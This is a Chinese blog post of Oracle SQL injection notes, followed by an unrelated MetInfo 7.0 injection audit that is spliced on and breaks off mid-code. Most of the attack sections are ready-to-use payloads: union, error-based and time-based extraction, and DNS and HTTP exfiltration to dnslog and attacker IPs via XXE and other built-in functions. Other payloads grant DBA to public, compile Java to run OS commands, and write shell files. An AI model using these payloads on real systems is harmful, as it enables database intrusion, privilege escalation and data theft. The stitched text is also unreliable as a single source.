写在前头，本文是我在学习Oracle注入时做的笔记加以整理所作的分享，由于在面试中被问过几次，并不是很难的东西，总是被问住，所以决定抽一些时间彻底学习一遍。一些基本语法与Mysql差别也不是很大，学起来并不费劲。

本文极其适合入门选手，一篇文章足以帮你入门Oracle注入。抄了一些y4博客文章的目录，查阅官方文档细化了函数的使用。请搭配官方文档食用，并亲手实践为主，文中如有错误请通知我更改。

Oracle Database安装

为了方便，直接docker 拉一个镜像回来。

版本 Oracle Database 11g

# 拉取镜像
$ docker pull deepdiver/docker-oracle-xe-11g

# 启动容器
$ docker run -d --name oracledb -p 1002:22 -p 1521:1521 deepdiver/docker-oracle-xe-11g

# 可以选择进入docker操作，不需要将docker 22端口映射出来。
$ docker exec -it oracledb bash

基础学习

dual 是Oracle中的虚表，任何用户均可读取，常用在没有目标表的select 语句中。

Oracle数据库中使用的语言有三种，分别为：SQL,java,PL/SQL。

本文接下来所有记录的语法、函数使用等，均摘自Oracle官方文档，如有不明白之处自行去官网查询详细文档即可官方文档

体系结构

# 实例
  一个Oracle实例（Oracle Instance）有一系列的后台进程和内存结构组成。一个数据库可以有n个实例。

# 用户
  Oracle数据库的基本单位，等同于Mysql中的库。Mysql：当前数据库下有N张表  <=> Oracle：当前用户下有N张表。

# 表空间
  表空间是Oracle对物理数据库上相关数据文件（ORA或者DBF文件）的逻辑映射。一个数据库在逻辑上被划分成一到若干个表空间，每个表空间包含了在逻辑上相关的一组结构。每个数据库至少有一个表空间（称之为system表空间）。
  每个表空间由同一磁盘上的一个或多个文件组成，这些文件叫数据文件（datafile）。一个数据文件只能属于一个表空间。

# 数据文件（dbf,ora）
  数据文件是数据库的物理存储单位。表空间与数据文件是一对多的关系（用户与表空间也是一对多的关系），而数据文件只能属于一个表空间，删除数据文件需先删除该文件所属的表空间。
  表的数据，是由用户放入某一个表空间的，而这个表空间会随机把这些表数据放到一个或多个数据文件中。

Oracle数据库中常用角色

connect --连接角色，基本角色
resource --开发者角色
dba --超级管理员角色

Oracle数据库存在默认用户：scott，密码：tiger。需要超级管理员权限用户解锁。

语法

# 查看当前连接用户
SQL> select user from dual;
# 创建用户名为sqli密码为pentest的用户
SQL> create user sqli identified by pentest;
# 给新创建的用户授权，connect角色：保证该用户可以连接数据库；resource角色：该用户可以使用数据库资源
SQL> grant connect,resource to sqli;
# 删除用户：当前连接数据库的用户必须具有删除用户权限（如sys）

# 创建表空间（需要超级管理员权限）
SQL> create tablespace pentest
  2  datafile '/tmp/pentest.dbf'
  3  size 100m
  4  autoextend on
  5  next 10m;

Tablespace created.
# 删除表空间
SQL> drop tablespace pentest; --删除表空间后，数据文件依旧存在。

Tablespace dropped.

数据类型

1. varchar, varchar2  表示一个字符串。
2. NUMBER    NUMBER(n)表示一个整数，长度是n；NUMBER(m,n)表示一个小数，总长度m，小数：n，整数是m-n。
    eg: NUMBER(4,2) 表示最大可以存储数字为99.99
3. DATA      表示日期类型
4. CLOB      大对象，表示大文本数据类型，可存4G
5. BLOB      大对象，表示二进制数据，可存4G

语法

# 创建users表
SQL> create table users(
  2  id number(10),
  3  uname varchar2(16),
  4  pwd varchar2(32)
  5  )
  6  ;

Table created.
# 添加列
SQL> alter table users add email varchar2(40);
# 修改列数据类型
SQL> alter table users modify email char(40);
# 修改列的名称
SQL> alter table users rename column email to sex;
# 删除列
SQL> alter table users drop column sex;
# 插入数据（values字符串不能使用双引号）
SQL> insert into users (id,uname,pwd) values(1,'admin','ab71giedas98g1o2dasgd12e98g');

1 row created.
# 修改数据
update users set uname='administrator';
# 删除数据
delete from users where uname='administrator';

序列

# 默认从1开始：依次递增，主要用来给主键赋值使用。序列不真的属于任何表，但是可以逻辑和表做绑定。
SQL> create sequence s_users;

Sequence created.
SQL> insert into users (id,uname,pwd) values(s_users.nextval,'ceshi','d81bojd09sha1onpmd09a');

1 row created.
SQL> select * from users;

        ID UNAME            PWD
---------- ---------------- --------------------------------
         1 admin            ab71giedas98g1o2dasgd12e98g
         3 ceshi            d81bojd09sha1onpmd09a

Orcale数据库注入学习

基础

# Oracle中使用``||``拼接字符串
SQL> select 'pen'||'test' from dual;

'PEN'||
-------
pentest
# 分页操作（mysql中的limit）
SQL> select * from users where rownum<2; --rownum支持<,<=,!=


# 支持的注释符
--
-- -
--空格
/**/

注：Oracle 字符串区分大小写

信息获取

SQL> select banner from v$version;

BANNER
--------------------------------------------------------------------------------
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
PL/SQL Release 11.2.0.2.0 - Production
CORE    11.2.0.2.0      Production
TNS for Linux: Version 11.2.0.2.0 - Production
NLSRTL Version 11.2.0.2.0 - Production

# 获取其中某版本使用正则即可，举例：
SQL> select banner from v$version where banner like 'Oracle%';

BANNER
--------------------------------------------------------------------------------
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

# 获取当前所连接的用户名
SQL> select user from dual;

USER
------------------------------
SQLI

# 获取数据库中所有用户
SQL> select username from all_users;
SELECT name FROM sys.user$; -- 需要高权限

# 获取当前用户权限
SQL> select * from session_privs;

# 获取当前用户所拥有权限下的所有数据库
SQL> select distinct owner,table_name from all_tables;

# 获取指定表的字段（注意这里的table_name全部大写）
SQL> select column_name from all_tab_columns where table_name='USERS';

COLUMN_NAME
------------------------------
ID
UNAME
PWD

Oracle提供了一个名为的内置命名空间USERENV，用于描述当前会话。以下语句返回登录到数据库的用户的名称：

SQL> select SYS_CONTEXT('USERENV','SESSION_USER') from dual;

SYS_CONTEXT('USERENV','SESSION_USER')
--------------------------------------------------------------------------------
SQLI

SQL> select SYS_CONTEXT('USERENV','AUTHENTICATED_IDENTITY') from dual;

SYS_CONTEXT('USERENV','AUTHENTICATED_IDENTITY')
--------------------------------------------------------------------------------
sqli

具体其他的parameter官方文档有写

备忘录

1. GLOBAL_NAME 包含一行，显示当前数据库的全局名称。

2. LISTAGG对ORDER BY子句中指定的每个组内的数据进行排序，然后合并度量列的值。measure_expr可以是任何表达。度量列中的空值将被忽略。

3. USER_TABLES描述当前用户拥有的关系表。

4. ALL_TABLES描述当前用户可访问的关系表。（类似Mysql中的information_schema.tables）

5. DBA_ALL_TABLES描述数据库中的所有对象表和关系表。其列与中的列相同ALL_ALL_TABLES。

6. ALL_ALL_TABLES描述当前用户可访问的对象表和关系表。

7. USER_ALL_TABLES描述当前用户拥有的对象表和关系表。

8. DBA_TABLES描述数据库中的所有关系表，其列与ALL_TABLES中的列相同，查询条件：DBA权限用户。

# 获取当前数据库名
SQL> select * from global_name;

GLOBAL_NAME
--------------------------------------------------------------------------------
XE
# 实现mysql的group_concat
SQL> select listagg(column_name,'~') within group (order by column_name) from user_tab_columns;

LISTAGG(COLUMN_NAME,'~')WITHINGROUP(ORDERBYCOLUMN_NAME)
--------------------------------------------------------------------------------
ID~PWD~UNAME

联合查询

注：Oracle中表达式必须具有与对应表达式相同的数据类型，且在Oralce数据库中要求select语句后必须指定要查询的表名（使用虚表dual即可)

SQL> select * from users where id=2 union select null,null,null from dual;

        ID UNAME            PWD
---------- ---------------- --------------------------------

# 获取表名
SQL> select * from users where id=2 union select null,null,(select listagg(table_name,'~') within group(order by 1) from all_tables where owner='SQLI') from dual;

        ID UNAME
---------- ----------------
PWD
--------------------------------------------------------------------------------

ADDRESS~USERS

# 获取指定表的字段名
SQL> select * from users where id=2 union select null,null,(select listagg(column_name,':') within group(order by 1) from all_tab_columns where table_name='USERS') from dual;

        ID UNAME
---------- ----------------
PWD
--------------------------------------------------------------------------------

ID:PWD:UNAME
# 获取指定字段内容
SQL> select * from users where id=2 union select null,null,(select listagg(uname||'&'||pwd,':') within group(order by 1) from users where rownum=1) from dual;

    ID UNAME
---------- ----------------
PWD
--------------------------------------------------------------------------------

admin&ab71giedas98g1o2dasgd12e98g

报错注入

报错注入的本质就是使数据库返回一个语法等错误，并且返回错误中的某些内容我们可控，借此来获取我们需要的信息。

备忘录

1. UTL_INADDR程序包提供了一个PL/SQL过程来支持Internet寻址。它提供了一个API，用于检索本地和远程主机的主机名和IP地址。

# 此程序包是调用者的权限程序包，这意味着必须connect在分配给他或她希望连接到的远程网络主机的访问控制列表中向调用用户授予特权。

# Syntax
UTL_INADDR.GET_HOST_NAME (
   ip  IN VARCHAR2 DEFAULT NULL)
RETURN host_name VARCHAR2;

由于GET_HOST_ADDRESS函数所需参数类型是varchar2，且报错时会讲参数表达式结果返回，因此可以借此实现报错注入。GET_HOST_NAME函数同理。

需要注意的是，执行UTL_INADDR软件包需要拥有connect权限的用户，本次学习环境为11g，因此本次笔记暂不考虑之前版本。

2. ctxsys.drithsx.sn，没找到具体官方文档说明，用法如下：

SQL> select * from users where id=1 and 1=(select ctxsys.drithsx.sn(1,(select user from dual))from dual);

3. ctxsys.ctx_report.token_type，这是一个辅助功能，可将英语名称转换为数字标记类型。

# 使用方法
function token_type(
  index_name in varchar2,
  type_name  in varchar2
) return number;

SQL> select ctxsys.ctx_report.token_type((select user from dual),1) from dual;
select ctxsys.ctx_report.token_type((select user from dual),1) from dual
       *
ERROR at line 1:
ORA-20000: Oracle Text error:
DRG-10502: index SQLI does not exist
ORA-06512: at "CTXSYS.DRUE", line 160
ORA-06512: at "CTXSYS.CTX_REPORT", line 711

这种类似的可以用来报错注入的函数很多，举个例子：

SQL> select ctxsys.ctx_report.token_info('aa','xx',1)from dual;
ERROR:
ORA-20000: Oracle Text error:
DRG-10502: index AA does not exist
ORA-06512: at "CTXSYS.DRUE", line 160
ORA-06512: at "CTXSYS.CTX_REPORT", line 615
ORA-06512: at line 1

no rows selected

4. dbms_xdb_version.checkin,此函数检入已签出的VCR，并返回新创建版本的资源ID。

# 用法
DBMS_XDB_VERSION.CHECKIN(
   pathname VARCHAR2) 
 RETURN DBMS_XDB.resid_type;

 如果路径名不存在，则会引发异常。

SQL> select * from users where id=1 and '0x2e'=(select dbms_xdb_version.checkin((select user from dual))from dual);
select * from users where id=1 and '0x2e'=(select dbms_xdb_version.checkin((select user from dual))from dual)
              *
ERROR at line 1:
ORA-31001: Invalid resource handle or path name "SQLI"

需要注意使用二进制数据类型

dbms_xdb_version.makeversioned

DBMS_XDB_VERSION.MAKEVERSIONED(
   pathname   VARCHAR2) 
 RETURN DBMS_XDB.resid_type;

如果资源不存在，则会引发异常。

需要注意使用二进制数据类型

报错注入的payload就不写太多了，原理感觉都那样，还有很多类似的函数等可以挖掘出来，具体还有哪些常见的报错注入payload可以看Y4er博客文章里面的总结。

盲注

感觉这部分没什么可以记录的，盲注的思路都差不多，字符串比较，运算符的运用。随便记录一下吧。

# decode函数用来比较。
SQL> select * from users where id=1 and 1=(select decode(user,'SQLI',1) from dual);
SQL> select * from users where id=1 and 'S'=(select substr(user,1,1)from dual);

需要注意大小写的问题

延时注入

# 用来判断注入点还行
SQL> select count(*) from all_objects;

# 利用了oracle管道功能接收消息的函数RECEIVE_MESSAGE，实现延时注入
DBMS_PIPE.RECEIVE_MESSAGE (
   pipename     IN VARCHAR2,
   timeout      IN INTEGER      DEFAULT maxwait)
RETURN INTEGER;

# 简单的使用
SQL> select dbms_pipe.receive_message('aaa',3) from dual;

DBMS_PIPE.RECEIVE_MESSAGE('AAA',3)
----------------------------------
                 1
SQL> select dbms_pipe.receive_message('aaa',(decode((select user from dual),'SQLI',3))) from dual;

带外攻击OOB（Out Of Band）

既然是带外攻击，自然需要connect

utl_http.request

UTL_HTTP.REQUEST (
   url              IN VARCHAR2,
   proxy            IN VARCHAR2 DEFAULT NULL, 
   wallet_path      IN VARCHAR2 DEFAULT NULL,
   wallet_password  IN VARCHAR2 DEFAULT NULL)
RETURN VARCHAR2;

SQL> select utl_http.request('http://ip/?result='||(select user from dual))from dual;

我这里测试没有成功，报错ORA-00904: : invalid identifier，可能是版本问题。

utl_inaddr.get_host_address

报错注入那个函数，不过多介绍了

SQL> select utl_inaddr.get_host_address((select user from dual)||'.o6xgjz.dnslog.cn')from dual;

DBMS_LDAP

DBMS_LDAP软件包使您可以从LDAP服务器访问数据。

FUNCTIONN INIT():
    init()用LDAP服务器初始化会话。这实际上建立了与LDAP服务器的连接。

# 语法
FUNCTION init      
(
hostname IN VARCHAR2,
portnum  IN PLS_INTEGER
)
RETURN SESSION;

HTTPURITYPE

可以创建UriType列，并在其中存储DBURITYPE，XDBURITYPE或HTTPURITYPE的实例。 您还可以定义自己的UriType子类型来处理不同的URL协议。

列举几个可以带外的函数
通过阅读官方文档，明显可以看出会请求httpuritype所指定的uri的函数有哪些。

1. GETCONTENTTYPE() 作用：返回URI指向的文档的内容类型。
2. GETCLOB() 作用：返回位于HTTP URL地址的CLOB。
3. GETBLOB() 作用：返回位于URL指定的地址的BLOB。
   select httpuritype.createuri('http://xxx.o6xgjz.dnslog.cn/').getblob() from dual;
4. GETXML() 作用：返回位于URL指定的地址的。
   select httpuritype.createuri('http://xxx.o6xgjz.dnslog.cn/').getxml() from dual;

文章到此为止了，仅作为Oracle注入入门的学习笔记，在后续学习java的过程中，会继续将Oracle注入更深入的利用（历史漏洞XXE，提权，执行命令等）记录笔记并做分享。

抛砖引玉

一些很常见的tips在Oracle数据库中的尝试，至于具体实际中如何去bypass waf，还望自行发挥。

# 借用了在MySQL中bypass常用的技巧来做了简单的可行性测试，注释符和换行的搭配使用。
1. 注释符拼接垃圾字符配合换行
SQL> select -- asdnaso/*asdas*/
  2  user from--ioasndoiand
  3  dual;

USER
------------------------------
SQLI

2. 利用waf的通用性特点
SQL> select user/*!saho*/from dual;

USER/*!SAHO*/
------------------------------
SQLI

SQL> 


调用函数是可使用空格换行等
select ctxsys. drithsx.sn(user,'aa')from dual;  

在线靶场
http://o1.lab.aqlab.cn:81/?id=1

你学废了吗？

Oracle和MySQL数据库语法大致相同，结构不太相同。最大的一个特点就是oracle可以调用Java代码。

对于“数据库”这个概念而言，Oracle采用了”表空间“的定义。数据文件就是由多个表空间组成的，这些数据文件和相关文件形成一个完整的数据库。当数据库创建时，Oracle 会默认创建五个表空间：SYSTEM、SYSAUX、USERS、UNDOTBS、TEMP：
1. SYSTEM：看名字就知道这个用于是存储系统表和管理配置等基本信息
2. SYSAUX：类似于 SYSTEM，主要存放一些系统附加信息，以便减轻 SYSTEM 的空间负担
3. UNDOTBS：用于事务回退等
4. TEMP：作为缓存空间减少内存负担
5. USERS：就是存储我们定义的表和数据

在Oracle中每个表空间中均存在一张dual表，这个表是虚表，并没有实际的存储意义，它永远只存储一条数据，因为Oracle的SQL语法要求select后必须跟上from，所以我们通常使用dual来作为计算、查询时间等SQL语句中from之后的虚表占位，也就是select 1+1 from dual。

再来看Oracle中用户和权限划分：Oracle 中划分了许多用户权限，权限的集合称为角色。例如 CONNECT 角色具有连接到数据库权限，RESOURCE 能进行基本的增删改查，DBA 则集合了所有的用户权限。在创建数据库时，会默认启用 sys、system 等用户：
1. sys：相当于 Linux 下的 root 用户。为 DBA 角色
2. system：与 sys 类似，但是相对于 sys 用户，无法修改一些关键的系统数据，这些数据维持着数据库的正常运行。为 DBA 角色。
3. public：public 代指所有用户（everyone），对其操作会应用到所有用户上（实际上是所有用户都有 public 用户拥有的权限，如果将 DBA 权限给了 public，那么也就意味着所有用户都有了 DBA 权限）

基本语法

select column, group_function(column)
from table
[where condition]
[group by group_by_expression]
[having group_condition]
[order by column];

Oracle要求select后必须指明要查询的表名，可以用dual。

Oracle使用 || 拼接字符串，MySQL中为或运算。

单引号和双引号在Oracle中虽然都是字符串，但是双引号可以用来消除关键字，比如sysdate。

Oracle中limit应该使用虚表中的rownum字段通过where条件判断。

Oracle中没有空字符，''和’null’都是null，而MySQL中认为''仍然是一个字符串。

Oracle对数据格式要求严格，比如union select的时候，放到下文讲。

Oracle的系统表：
– dba_tables : 系统里所有的表的信息，需要DBA权限才能查询
– all_tables : 当前用户有权限的表的信息
– user_tables: 当前用户名下的表的信息
– DBA_ALL_TABLES：DBA 用户所拥有的或有访问权限的对象和表
– ALL_ALL_TABLES：某一用户拥有的或有访问权限的对象和表
– USER_ALL_TABLES：某一用户所拥有的对象和表

DBA_TABLES >= ALL_TABLES >= USER_TABLES

信息收集

从现在开始，我们以注入点http://localhost:8080/oracleInject/index?username=admin为例讲解。代码随便写一个jsp网页就行了。

获取数据库版本信息

http://localhost:8080/oracleInject/index?username=admin' union select 1,'a',(SELECT banner FROM v$version WHERE banner LIKE 'Oracle%25') from dual -- +

获取操作系统版本信息

http://localhost:8080/oracleInject/index?username=admin' union select 1,'a',(SELECT banner FROM v$version where banner like 'TNS%25') from dual -- +

获取当前数据库

http://localhost:8080/oracleInject/index?username=admin' union select 1,'a',(SELECT name FROM v$database) from dual -- +

获取数据库用户

SELECT user FROM dual;

获取所有数据库用户

SELECT username FROM all_users;
SELECT name FROM sys.user$; -- 需要高权限

获取当前用户权限

SELECT * FROM session_privs

获取当前用户有权限的所有数据库

SELECT DISTINCT owner, table_name FROM all_tables

获取表，all_tables类似于MySQL中的information_schema.tables，里面的结构可以自己构造sql语句。

SELECT * FROM all_tables;

获取字段名

SELECT column_name FROM all_tab_columns

在Oracle启动时，在 userenv 中存储了一些系统上下文信息，通过 SYS_CONTEXT 函数，我们可以取回相应的参数值。包括当前用户名等等。

SELECT SYS_CONTEXT（'USERENV'，'SESSION_USER'） from dual;

更多可用参数说明可以查阅 Oracle 提供的文档：SYS_CONTEXT

注入类型

联合查询

order by 猜字段数量，union select进行查询，需要注意的是每一个字段都需要对应前面select的数据类型(字符串/数字)。所以我们一般先使用null字符占位，然后逐位判断每个字段的类型，比如：

http://localhost:8080/oracleInject/index?username=admin' union select null,null,null from dual -- 正常
http://localhost:8080/oracleInject/index?username=admin' union select 1,null,null from dual -- 正常说明第一个字段是数字型
http://localhost:8080/oracleInject/index?username=admin' union select 1,2,null from dual -- 第二个字段为数字时错误
http://localhost:8080/oracleInject/index?username=admin' union select 1,'asd',null from dual -- 正常 为字符串 依此类推

查数据库版本和用户名

http://localhost:8080/oracleInject/index?username=admin' union select 1,(select user from dual),(SELECT banner FROM v$version where banner like 'Oracle%25') from dual -- 

查当前数据库

http://localhost:8080/oracleInject/index?username=admin' union select 1,(SELECT global_name FROM global_name),null from dual -- 

查表，wmsys.wm_concat()等同于MySQL中的group_concat()，在11gr2和12C上已经抛弃，可以用LISTAGG()替代

http://localhost:8080/oracleInject/index?username=admin' union select 1,(select LISTAGG(table_name,',')within group(order by owner)name from all_tables where owner='SYSTEM'),null from dual -- 

但是LISTAGG()返回的是varchar类型，如果数据表很多会出现字符串长度过长的问题。这个时候可以使用通过字符串截取来进行。

查字段

http://localhost:8080/oracleInject/index?username=admin' union select 1,(select column_name from all_tab_columns where table_name='TEST' and rownum=2),null from dual -- 

有表名字段名出数据就不说了。

报错注入

utl_inaddr.get_host_name

select utl_inaddr.get_host_name((select user from dual)) from dual;

11g之后，使用此函数的数据库用户需要有访问网络的权限

ctxsys.drithsx.sn

select ctxsys.drithsx.sn(1, (select user from dual)) from dual;

处理文本的函数，参数错误时会报错。

CTXSYS.CTX_REPORT.TOKEN_TYPE

select CTXSYS.CTX_REPORT.TOKEN_TYPE((select user from dual), '123') from dual;

XMLType

我在12c中测试失败。

http://localhost:8080/oracleInject/index?username=admin' and (select upper(XMLType(chr(60)||chr(58)||(select user from dual)||chr(62))) from dual) is not null --

注意url编码，如果返回的数据有空格的话，它会自动截断，导致数据不完整，这种情况下先转为 hex，再导出。

dbms_xdb_version.checkin

select dbms_xdb_version.checkin((select user from dual)) from dual;

dbms_xdb_version.makeversioned

select dbms_xdb_version.makeversioned((select user from dual)) from dual;

dbms_xdb_version.uncheckout

select dbms_xdb_version.uncheckout((select user from dual)) from dual;

dbms_utility.sqlid_to_sqlhash

SELECT dbms_utility.sqlid_to_sqlhash((select user from dual)) from dual;

ordsys.ord_dicom.getmappingxpath

select ordsys.ord_dicom.getmappingxpath((select user from dual), 1, 1) from dual;

UTL_INADDR.get_host_name

select UTL_INADDR.get_host_name((select user from dual)) from dual;

UTL_INADDR.get_host_address

select UTL_INADDR.get_host_name('~'||(select user from dual)||'~') from dual;

盲注

布尔盲注

布尔盲注第一种是可以使用简单的字符串比较来进行，比如：

http://localhost:8080/oracleInject/index?username=admin' and (select substr(user, 1, 1) from dual)='S' --

然后还有一种是通过decode配合除数为0来进行布尔盲注。

http://localhost:8080/oracleInject/index?username=admin' and 1=(select decode(substr(user, 1, 1), 'S', (1/1),0) from dual) --

时间盲注

1. 大量数据

select count(*) from all_objects

缺点就是不准。

2. 时间延迟函数

select 1 from dual where DBMS_PIPE.RECEIVE_MESSAGE('asd', REPLACE((SELECT substr(user, 1, 1) FROM dual), 'S', 10))=1;

还可以配合decode

select decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS',10),0) from dual;

带外OOB

类似于MySQL load_file的带外盲注。OOB 都需要发起网络请求的权限，有限制。

utl_http.request

需要出外网HTTP

utl_inaddr.get_host_address

dns解析带外

select utl_inaddr.get_host_address((select user from dual)||'.cbb1ya.dnslog.cn') from dual

SYS.DBMS_LDAP.INIT

这个函数在 10g/11g 中是 public 权限.

SELECT DBMS_LDAP.INIT((select user from dual)||'.24wypw.dnslog.cn',80) FROM DUAL;

HTTPURITYPE

SELECT HTTPURITYPE((select user from dual)||'.24wypw.dnslog.cn').GETCLOB() FROM DUAL;

其他

如果 Oracle 版本 <= 10g，可以尝试以下函数：
1. UTL_INADDR.GET_HOST_ADDRESS
2. UTL_HTTP.REQUEST
3. HTTP_URITYPE.GETCLOB
4. DBMS_LDAP.INIT and UTL_TCP

Oracle XXE (CVE-2014-6577)

说是xxe，实际上应该算是利用xml的加载外部文档来进行数据带外。支持http和ftp
1. http

select 1 from dual where 1=(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://192.168.124.1/'||(SELECT user from dual)||'"> %remote;]>'),'/l') from dual); 

2. ftp

select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "ftp://'||user||':bar@IP/test"> %remote; %param1;]>'),'/l') from dual;

提权

前文说了Oracle可以调用Java程序

GET_DOMAIN_INDEX_TABLES函数注入

影响版本:Oracle 8.1.7.4, 9.2.0.1 – 9.2.0.7, 10.1.0.2 – 10.1.0.4, 10.2.0.1-10.2.0.2

漏洞的成因是该函数的参数存在注入，而该函数的所有者是sys，所以通过注入就可以执行任意sql，该函数的执行权限为public，所以只要遇到一个oracle的注入点并且存在这个漏洞的，基本上都可以提升到最高权限。

1. 权限提升

http://localhost:8080/oracleInject/index?username=admin' and (SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS _OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant dba to public'''';END;'';END;--','SYS',0,'1',0)) is not null--

2. 创建Java代码执行命令

http://localhost:8080/oracleInject/index?username=admin' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "Command" as import java.io.*;public class Command{public static String exec(String cmd) throws Exception{String sb="";BufferedInputStream in = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());BufferedReader inBr = new BufferedReader(new InputStreamReader(in));String lineStr;while ((lineStr = inBr.readLine()) != null)sb+=lineStr+"n";inBr.close();in.close();return sb;}}'''';END;'';END;--','SYS',0,'1',0) from dual) is not null --

3. 赋予Java执行权限

http://localhost:8080/oracleInject/index?username=admin' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual) is not null --

4. 创建函数

http://localhost:8080/oracleInject/index?username=admin' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function cmd(p_cmd in varchar2) return varchar2 as language java name ''''''''Command.exec(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual) is not null --

5. 赋予函数执行权限

http://localhost:8080/oracleInject/index?username=admin' and (select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on cmd to public'''';END;'';END;--','SYS',0,'1',0) from dual) is not null--

6. 执行命令

http://localhost:8080/oracleInject/index?username=admin' and (select sys.cmd('cmd.exe /c whoami') from dual) is not null--

DBMS_JVM_EXP_PERMS绕过JVM执行命令

移步：
1. https://www.notsosecure.com/hacking-oracle-11g/
2. https://www.exploit-db.com/exploits/33601

xml反序列化绕过JVM执行命令 CVE-2018-3004

如果当前数据库用户具有connect和resource权限，则可以尝试使用反序列化来进行执行命令。Oracle Enterprise Edition 有一个嵌入数据库的Java虚拟机，而Oracle数据库则通过Java存储过程来支持Java的本地执行。

--create or replace function get_java_property(prop in varchar2) return varchar2
--   is language java name 'java.lang.System.getProperty(java.lang.String) return java.lang.String';
--/
select get_java_property('java.version') from dual;

原作者写的是java.name.System，这里应该使用java.lang.System

虽然你以为可以执行Java代码了，直接冲Runtime.getRuntime().exec()就完事了，但是实际上Oracle对权限进行了细致的划分，并不能直接冲。我们可以用一个xml的反序列化来冲。

BEGIN
 decodeme('<?xml version="1.0" encoding="UTF-8" ?>
<java version="1.4.0" class="java.beans.XMLDecoder"> 
<object class="java.io.FileWriter">
                      <string>c:\app\1.txt</string>
                      <boolean>True</boolean>
                      <void method="write">
                         <string>aaa</string>
                      </void>
                      <void method="close" />
                   </object>
</java>');
END;
/

试了试好像不能执行命令，但是可以写文件。写个shell还是绰绰有余的，当然你还可以写ssh公钥。

参考

1. https://www.iswin.org/2015/06/13/hack-oracle
2. http://obtruse.syfrtext.com/2018/07/oracle-privilege-escalation-via.html?m=1
3. https://www.cnblogs.com/-qing-/p/10949562.html
4. Oracle 注入指北
5. https://www.notsosecure.com/hacking-oracle-11g/

文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽。

跟汤姆表哥再搞创宇的年度任务🤒，昨天发了metinfo6.2.0的组合拳，今天看了看官网有最新版的7.0，就下下来看了看，发现两枚注入，而且昨天的组合拳增加了后缀校验，绕不过去了，呜呜呜。

sql injection 1

全局搜索where

app/system/parameter/include/class/parameter_op.class.php:165

public function paratem($listid = '',$module = '',$class1 = '',$class2 = '',$class3 = ''){
    global $_M;

    $paralist = $this->get_para_list($module,$class1,$class2,$class3);
    foreach ($paralist as $key => $para) {
        $list = $this->parameter_database->get_parameters($module,$para['id']);
        $paralist[$key]['list'] = $list;
        if($para['type'] ==4 || $para['type'] ==2 || $para['type'] ==6){
            $values = array();
            foreach ($list as $val) {
                $query = "SELECT * FROM {$_M['table']['plist']} WHERE listid = {$listid} AND paraid={$para['id']} AND module={$module} AND info = '{$val['id']}' AND lang = '{$_M['lang']}'";
                $para_value = DB::get_one($query);
                if($para_value){
                    $values[] = $para_value['info'];
                }
            }
            $query = "SELECT * FROM {$_M['table']['plist']} WHERE listid = {$listid} AND paraid={$para['id']} AND module={$module} AND lang = '{$_M['lang']}'";
            $para_value = DB::get_one($query);
            $values = $para_value['info'];
        }else{
            $query = "SELECT * FROM {$_M['table']['plist']} WHERE listid = {$listid} AND paraid={$para['id']} AND module={$module} AND lang = '{$_M['lang']}'";
            $para_value = DB::get_one($query);
            $values = $para_value['info'];
        }


        if(is_array($values)){
            $paralist[$key]['value'] = implode('|', $values);
        }else{
            $paralist[$key]['value'] = $values;
        }
    }
    return $paralist;
    ##require PATH_WEB.'app/system/include/public/ui/admin/paratype.php';
}

发现{$listid}直接被拼接进sql语句，且listid是函数直接传进来的参数，搜索哪些函数调用了这个函数

app/system/product/admin/product_admin.class.php:171

public function dopara() {
    global $_M;
    if($_M['form']['app_type']=='shop'){
        $class1 = $_M['form']['class1'];
        $class2 = $_M['form']['class2'];
        $class3 = $_M['form']['class3'];
        $paralist = $this->para_op->paratem($_M['form']['id'],$this->module,$class1,$class2,$class3);
        require PATH_WEB . 'app/system/include/public/ui/admin/paratype.php';
    }else{
        parent::dopara();
    }
}

$_M['form']['id']可控，那么sql语句就可控。

payload

http://php.local/admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=2 union SELECT 1,2,3,user(),5,6,7 limit 5,1  -- +

sql injection 2

app/system/language/admin/language_general.class.php:108

public function doget_admin_pack($appno,$site,$editor)
{
    global $_M;
    $sql = $appno ? "AND app = {$appno}" : '';
    $language_data = array();
    if ($site == 'admin') {
        $query = "SELECT name,value FROM {$_M['table']['language']} WHERE lang='{$editor}' AND site ='1' {$sql}";
        $language_data = DB::get_all($query);
        $lang_pack_url = PATH_WEB . 'cache/language_admin_' . $editor . '.ini';
    } else if ($site == 'web') {
        $query = "SELECT name,value FROM {$_M['table']['language']} WHERE lang='{$editor}' AND site ='0' {$sql}";
        $language_data = DB::get_all($query);
